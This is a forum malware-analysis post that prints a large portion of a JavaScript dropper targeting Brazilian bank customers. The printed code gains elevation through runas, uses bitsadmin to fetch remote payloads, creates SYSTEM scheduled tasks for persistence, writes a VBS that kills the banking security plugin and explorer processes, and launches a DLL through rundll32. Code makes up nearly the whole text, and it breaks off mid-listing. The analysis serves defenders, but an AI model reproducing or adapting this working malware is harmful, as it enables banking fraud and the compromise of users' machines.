Malware Analysis 4/54 Arq-comprov.js - Sample targeting Brazilian Banks

DardiM

May 14, 2016
From https://malwaretips.com/threads/05-11-2016-7.65155/
Thanks to @Daniel Hidalgo

Arq-comprov.js

Why this sample ?

It uses poor obfuscation, but the way it is done is interesting.

.js => 2 .bat + 3 .vbs
1) What it looks like :

I can't post a spoiler of the whole code here: it is too long.

So I have removed all the comment parts and left some of the code:

Look at the spoiler part !
var Nv3RU90Lt5ZG = new ActiveXObject("Scripting.FileSystemObject");

var j3Tezo2PL9ok = new ActiveXObject("wscript.shell");

var p4KBH5u64vNz = "gbplugin";

var go6xt1m8jIZKV = "scpbrad";

var lg9Ba493sIk = false;

var CYjK6el1 = false;

L2jl14qQMb = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES(x86)%");

FKQRd91EjgEw8 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES%");

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb)) {

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb + "\\" + p4KBH5u64vNz))

{

lg9Ba493sIk = true;

}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))

{

CYjK6el1 = true;

}

if (lg9Ba493sIk == false && CYjK6el1 == false)

{

WScript.Echo("Error Unknow");

WScript.Quit();

}


} else {

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + p4KBH5u64vNz))

{
lg9Ba493sIk = true;

}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))
{


CYjK6el1 = true;

}

if (lg9Ba493sIk == false && CYjK6el1 == false)

{

WScript.Echo("Error Unknow");

WScript.Quit();

}

}


MjldoqNZhAokOT3DA = j3Tezo2PL9ok.ExpandEnvironmentStrings("%SYSTEMROOT%") + "/e0HbvG3WG";

if (WScript.Arguments.Count() == 0) {

var Koz6CN1gH = new ActiveXObject("Shell.Application");

while (!Nv3RU90Lt5ZG.FileExists(MjldoqNZhAokOT3DA)) {

Koz6CN1gH.ShellExecute("wscript.exe", "\"" + WScript.ScriptFullName + "\"" + " /a4gyFwxb6St0QHv1n", "", "runas", 1);

WScript.Sleep(10000);

}

WScript.Sleep(20000);

j3Tezo2PL9ok.Run('%SYSTEMROOT%\\notepad.exe', 0, false);


WScript.Quit();

}


try

{

Nv3RU90Lt5ZG.CreateFolder(j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps");

} catch (zc2Gj6bZLhiem8)

{}


var z4cwrnc7 = Nv3RU90Lt5ZG.CreateTextFile(MjldoqNZhAokOT3DA, true);

z4cwrnc7.Close();

IDxyPFq3XxAOsK4kEF = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\UQv5OyjGx1f.bat";

j5tq1MW730 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\v5KT1ENIDUVo.bat";

eUKbZgnryU = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\ngx2uq.vbs";
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(IDxyPFq3XxAOsK4kEF);

R9cs39N4.WriteLine("@echo off");



R9cs39N4.WriteLine("TIMEOUT 5");


R9cs39N4.WriteLine("%1 /Reset");


R9cs39N4.WriteLine("%1 /Create NZrk3biH7Y");



R9cs39N4.WriteLine("%1 /SetNotifyFlags NZrk3biH7Y 1");


R9cs39N4.WriteLine("%1 /SetMinRetryDelay NZrk3biH7Y 240");

R9cs39N4.WriteLine("::HSYh9jgN6P8DG9RQ9LjakX4Z9aP56LcCjb5MdqYt2aiC37SHemb05zundViaulGxu64NMb94Z2tuvetAfnExBSxNkfO5oFwWrw2dPdV0QLs8AL4s91NuCJHipavgqQCl2xkPjd17bO08j0OZ1XmT9Eh46jkDyFhWgrFP9R16drkW7DLH3pFe9S2X7Z6v5iJx8F1JQid6ty6AHRvIpe5pdkA3wQ3NifrD6v4Yr4bi0ouQn8ASaH0neuPfpTOfd3GErSmu9UsAQ6mWL7d01Qn0H7xXn5XO0R67zP2xn4tG5PSXAC325CsZ4gzrOeeg12C0WGJH60Bq4MJGTKqt1YvmI0AV5ozEitvN0P9pzcpo9p6kl8ntg49iYNDKaNwXdc8w423b2G0M0dLC6Q8hY1OkNb1c6t7EorLgxRLo34m09J3jrlZ2wBbWVGdvmJfTPMUnMsag4Hrd2u56qkX7x1H4iG30YTjEM1LIKRy16i1m8666n14HNbvSxKbaFKiqnciI0IKbY3mnGM9OiaQrtms8e9nwg0tRufX4PiVQvWKoCQcL2k3JA8A7tx7ox0XusSgy2drteBvZ8B5lbC4LitbHiEdR0hqht79t6ddAI6eTJ5Hn7A6Jvs5m7os21vW0OIRe");



R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(") ELSE (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");


R9cs39N4.WriteLine("::N2X6PmNRAZk7W19z8dRYXaLEK8yuy9Yf1AR326kqJJ7zAfUNC7GDl2NwU94i8G0x58rLFQC6ijyvSOZzzmQQ5Piks3J1s2V6Phc0Su8ukr1b2Ch7fMu08xtzB2kkubp994AaMcQ68tIX8caaE94M087k4BSjZML4Zi25GD9jc3f7G2cKPgV081gHNEBK67nIfiBRUA943Toa9crbdMJeUdNf3aQFuVPxMaez8LdtfXYU4bRB5om6xn9n8DbL5G68zgf2lC8v3Ml0ovZOtQPMxw6x8DNmUjZ7bRtOmv46Bgapp85NaE8D9y6RM96pTTepko5LRMaS6eNmivghVwMlqEs8g69304hMV3YFcNVvXbN9Eqh06q0m14h1552Zjll8Plb157QGvEnd0vK0WOfRJ5DuE8yH557M069dNFxdEX8R1IHY6662hDRzcGSfWDgbGARPF3fCfQnMbPSa5LubDT6uZgOnF8V4R7ndd8HqMS6aC4dUK4SZ6PZ8Y4Y8A2vuu5ESXATpmzfHdwvHK0UvUrSi5754N2fx53lZLj7SfI1UOcA3fvHVA1N6gUlwMnFHXsuoSiS59omn6NSeR0uhtEA3LVWexjk1V28vd9WuBpDRVTZXWzxvTY71xL56BAtzXKMirmampscHqNiZ6dwRx9doy0OV1Ng8J9H5I7Lk1nYgUOXbx88WT6R6d0VkCTip3pe0XqVQBbhIfTLX8JXwm60xWUOi72FSh92SmL523b48O7lpa1gNv22E5l93L9t5Wi9VOLondt38SSaPx1GOA61ruL5mXI0RjrwkGq82TX0cyyAom4V87Z6894K3162NzxxzIXsi99v4tYZ25FCLAeaZkK5mot3Zzh8S5YHpd3rSY6EiHK9D290XCYzk3E7G0dvkW7Ri5629F98eUKcidyX957K5l99bbjMf0m2i5IWpzK6GNv6CVY6z0rQSctoNFrIuCalzvT3R5fa3PXd6PGy5yCe46QJRJQO5OFY0xz5pR3YHy5BUXdd5beLst12p9022k9jhWI5dlH7V5fQU7c0v7Y0N22W7XRBS8btf8O1naMZ5mSStW2q9V6QMx7JGcI3nm7p4paoau23VxTSYRRvNjbzHw33I60sEGZ3p14jq18Av7C25Oc35w6v6ljua1cmk3U2kGtJJ7s21R1aJiGvXgeBeD81HsjpPBJWULq16N0SWwWb86L9Bn5rLmWxNzHk61y0DFdHpBwpwTcaM8wFAkgsGkY8r215EB0I5ElvK9");

R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:


R9cs39N4.WriteLine(") ELSE (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");
R9cs39N4.WriteLine("::bCsT41my6GrbHrC4YW4qUq821iPyXuPaO55DVtF1giwVlXOZ5JvDbuVa9DF6f8I1bTzzd91uI40FDFtkr15Bymci1omJ52ct9xD2QFeSTmHjLdPtazhVT2pZO9AfF09O7kTjwXOCLMm01h4o5DyKF9F4GPnCRNHc8k578y4Qy9hF5xi5ftp33S51iRHJ5tI55t110OfS");

R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(") ELSE (");

R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");


R9cs39N4.WriteLine("IF %PROCESSOR_ARCHITECTURE% == x86 (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(") ELSE (");


R9cs39N4.WriteLine("%1 /AddFile NZrk3biH7Y http:

R9cs39N4.WriteLine(")");


R9cs39N4.WriteLine('%1.exe /SetNotifyCmdLine NZrk3biH7Y "%comspec%" "cmd /c cscript.exe ' + eUKbZgnryU + '"');

R9cs39N4.WriteLine("::dMFK7zb9gVc2rjjGsh5hq8QJ222214KKHqeO48U7q8PgDrvqA0vs3gB4ZkFpk8KWhS3DIlihisAVZc94UXM9Mpqs8k7lPZkAwu9q7UhSbYENF5wxjruZjsdvYoNA9Xs7ytfRBFs9OANQbLAI8mGRzy9ITSivCtsUud3AKcu57tuCa56NxGqoI7vEcWBtF80vmOL0Vg2oYRyNbscXjDkK9apyi4A6qZfP7e2cefc24oo0stBOl1TYvcZ5x7H7FwD9lx06xNUZEmJkeCKWp54GAlXLY0uBoVj6dbYTX8DR8hY8wzaFwLQeAbtYapVQ6nyqxdnk3393zJtzG58O9bF32XQs28hSUpO6q8348r9FF0x8Ks19l6ItIRZ4TY29204Cx9GLn2DuiDYjilZ5OL2O");


R9cs39N4.WriteLine("%1 /Resume NZrk3biH7Y");
R9cs39N4.WriteLine("::wSZp4hi29tf1xBemIE0iYh1x0hxjK94cbTC7wgD0KHHu6IW65A3q2A28323YHkpTm490UBl6ynkPluLvdw7SsIWGJS5jrmgo2n59tMHbVi720IEVFuRYCW5zlmVLY6Eedtdkt5OwkMSUTf1dpAW1K78jM38E61998ewbL92P9u6dRE31V7HBPpsk6FV2zZq8bN3EUa4tsXTsI1O6MwHkW03tNq727F6k3e85VSseaZw57xaJP2P1bVfs0aTau24c6B5SAhE1a57XdSBYTnP3DTKoCXIKOZ5vQ4EzS84bhyO67E9BUEUL4vsquqawTHWrriJ8A6F8fBg60O42iJCp36ZHr04oj7kZ87iZ5eJf21FhI0N7lq59fKCg794WMDkfC32A3gD6y6GPM2Qdn9MvcTbdfy1EafRzSb4Oo6a8WbRZ5KSg96p2rPR0UoWEh2I9nUF60C7we58MtfTf26mUG1RI5naqV9Ji8d0B28mkXa5P0yM2zKyjUwK0TZyo3hh5jmD51tNjxey0cTF1iJkEZodBhFn7k5O3tSkN9PMwDet03srD5TPoEsrxxmeGNQ3ysYl7IQca0ob3GIPRWxf0EWA3i5FyRCHkTArYyEBGX41uGif6K0rK7B8j71i1Y4oJZO60nb3pBtrOl49QmH0Gnd3uX7CS2g3rpmFO4xIciELtooD96oE5z5rWRVhxxnbgRbc2956B9i4MhfEcDampYIG7lRoeE2u4fC8xDWEwvrB3AC542nFu1H08aDYvAL6YKiokcWDPNVKrF656QPoF018D0ZZ2wJjSe1yBll4rnDT9X7kN8S3aXHkSz72vhsxl57c4md5a652OtovXO4eyREZ1vaYAgacKL9RPrxdaKm12lWH7H6ckLFV32C5b0J8J131LafNGQx0OW9672eqky1v5J7bGzxHWoZsYkILFdz92VMu0x1Sr9owJuwQO2V9ggn2Bw6TfXey1K8442T1MB941n7B8Ns6qxhybox4CC1CX4M2FhvPJirg8u3U0kW4JMXbvL92unvJh05FyTrX3o67TUXYDuoo3YiMdV4Xv8J6fn9hSTiYOt5j4D3K4hzU30HGL8iZQTX07LSjQNfP9qLNdRR9U23hsgu2856Z3Lyv8E15QIJG7ymZGPS1pFzP6I1E6cT2T38Xa3pwD6ah724ZHHzMMv35i39MR6SUPbbhYn10wgW8Za6eBidJyE06Oz4ntZDco4hrk1YTGRj9VI65MFGS4FH5yATYkfLry9P2FpJv91Odfe8R9EkfrK9EjxZ48jNIoq1hIYP43NV86r8YDiZYQZ1T9v8sRiOvc6yDbBp9V3wrCRMGzhfK17mRln9lSlcA9Jo5TIynB5334wItLDhr4uX8O6151bSyt7LNYzR70GbqQn4R4DTH91n3V9PqMfm4nIz8GJzR0VgI0oLV26m5S9sfVT6pO4");

R9cs39N4.WriteLine('Erase "%0"');
R9cs39N4.Close();


j3Tezo2PL9ok.Run('%comspec% /c ' + IDxyPFq3XxAOsK4kEF + ' bitsadmin_ schtasks cmd rundll32', 0, false);


var aspas = "'";
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(j5tq1MW730);

R9cs39N4.WriteLine("@echo off");


R9cs39N4.WriteLine('SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:01 /TN "{D69166F8-5801-4516-85C9-A9AB6BF664E2}" /TR "%WINDIR%\\MSSevices32.exe" /RU SYSTEM');
R9cs39N4.WriteLine("::lv5Cs4oDfyiOS1DLdU52VNw0YuwL9fCK4QW70ps3810k20m8lLhpN9n6GNIB7F626ostWvmY0g1lr60HDKPd9193Cj1RQRV70cB7Zdpf87Im3DnGv2s6yWpT6hq10wanMvLdKLdpdlSDzV66PwWbaaouSAIHf2ZFxM4cX10shxK491z5s9cPC4ZVWWTIFhRwJS9N5tYxhzZF3PULTBK28pmSiF8R43B4Mr7wj78M6WP0nG1Cdq3Y5mQFyl400tlpOgFuWD0eSqHqeMCIbgvJJj9B71h6vh0WJxz37nBQ9okkC59F7rm14qbbl2VCPHgL1dfgVlagPDPXplu9biC8SL5pR64AS3Q2eJT8ddH7Dw6iTiETutUKp71dOYB1y0RQtd4a0I6j3aSY4hIhcESIByhSmD3ivO7YnqbxlqGUBoQhu2hO79JYVXH4iQ6taz05M6Z7F6iIXTDoQAouGrXoH8Trwf039I9virS4SyrKQL1dx7gEqz4yg4s65N1M0d1Ra6ea4t8D704xwab0SLTx65Mt0fmL1CVTTOkZrT9HJS5cbrphIgfpPBjaHp6pYcAu1V0kunJL1EaNN187kCr1Y6s3ajoV9Drk38fQmyodk2m6YxYmNF6dxi5cO55Y44FUnVg96elTRi3JYbHHucSY16n8EbAHoCEPN9eX0FK1WppajkY3LkxJLkV4qE6NFX9ru1ZXvHp140iL0ehtkSi755cP0dLuuAZEwDpnY3D7LRsehsd3SqVme9vFZvd3ruxIlMpZw4GZDpwzjCUSbSbOqLW6f9EdSAsr");


R9cs39N4.WriteLine('SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:30 /TN "{26B75C81-B815-4466-9DC5-5C91B370BADA}" /TR "cmd /c tasklist | find /i "' + aspas + 'AvastSvc.exe' + aspas + '">null || %WINDIR%\\555500.bat nogui ProcessHacker.exe" /RU SYSTEM');

R9cs39N4.WriteLine("::d9Kz7la2tlJp9o94W90qS0b82wTLLn5oqHG750R7WNs02w0A9YI1kiGMsJVzMS0j2RIAp5NkY0rdniYF6yjpROVgY733IN5N734SkrYSJlmN70ypYRaGb2pd99BD6Tp3I74FX359JeA3LCQ2orwz1JNJkvsvHTZOupbqBjIvA02Vn1JNB2zJnC08bXarVA42u6elsmufaT8H9Ovn11tg179Mo7Qxa6XF2Dd3it78ScOF6mCP9s21Bsu81n5hJ0hmSHseivx960E9u1eY8FSkvt8m3Ln8Lgbopnwq8LOl3KY3lioblIFHYi6UcN9aqWqDAc49f8qkNuuqq6bxUYuFed3VlPIoRZ60FW7aIRTCFZOgnY5ZwTi7ruuBvR4qQQbHC8RK6C1pD5H3UvWUVYVKvx9");

R9cs39N4.WriteLine("TIMEOUT 5");

R9cs39N4.WriteLine("::GTumM7UG61TPRyQPkwr2W5Y2m0XX8ZQBb9crel7we6vrY0DS8v01E86y0bjt3zvxfjuZpX5zO1qkdTxKiYa7QH6hgrP5vY6k1yqPM3wBoshG4K88k9lUh90K9CD34U0533G9O31WlCB73yzUe05ET6rKyn8lmBf5DHwnQBTBh14zFf1Sf62pMKA8tQ79Bk1tdLbTMJyNgLLg9Ziywptr1ATRA4CdQnpqgwS1g6uhYIb8VyjBoG8Q1ovD0TXHPpIErOwKhwzR8Rg8MXeINSwqnyrpuDehXnoyFpnxKoeN13ozpldb0QzyjB95XwZTXlKwG6yFtg5vCuFdQhpNU29g9I5eDs0AXGEvIdl6B3XREdE0Hy98ubjXI9Yd350sU2qQybfzqu40i1r1KhaGu0qDmp0iDT36FPI5L4NrRo335kOGujoNY3");

R9cs39N4.WriteLine("TIMEOUT 5");

R9cs39N4.WriteLine('echo On Error Resume Next> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');



R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");



R9cs39N4.WriteLine('echo WScript.Sleep(90000)>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");
R9cs39N4.WriteLine('echo xTsNBe0z1.Run("rundll32 %LOCALAPPDATA%\\Temps\\tykeo13w.iqld,#2 VEi8sQm")>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');



R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo RAj9WSg = ".">> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo Set UPOfAz2RnR = GetObject("winmgmts:" ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine('echo "{impersonationLevel=impersonate}!\\\\" ^& RAj9WSg ^& "\\root\\cimv2")>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');



R9cs39N4.WriteLine('echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine('echo Chr(039)^&Chr(103)^&Chr(098)^&Chr(112)^&Chr(115)^&Chr(118)^&Chr(046)^&Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo For Each gQ0GVRiRzf6e0 in h50KAQ29554T>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine('echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine('echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');
R9cs39N4.WriteLine("::aRXnffDlrp0D6N9XN7mpO0Ws7385lyrvyn20Z53Kc23g5mYfEC85PV0PWsyu85w0Q8uTVi20xnKly634EtPz5rOxWdb3m7sDne02iH3DL8MdjMqz7vMAaEAG4OcGxELzSXwEbRwtKSyVaaC7WI7t3cKLM8IMHkl5ygb7h9950joxdZI9B1LIPVF18ky3cB3k1Vtf23T2");
R9cs39N4.WriteLine('echo Chr(039)^&Chr(101)^&Chr(120)^&Chr(112)^&Chr(108)^&Chr(111)^&Chr(114)^&Chr(101)^&Chr(114)^&Chr(046) ^&_>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");




R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo Next>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

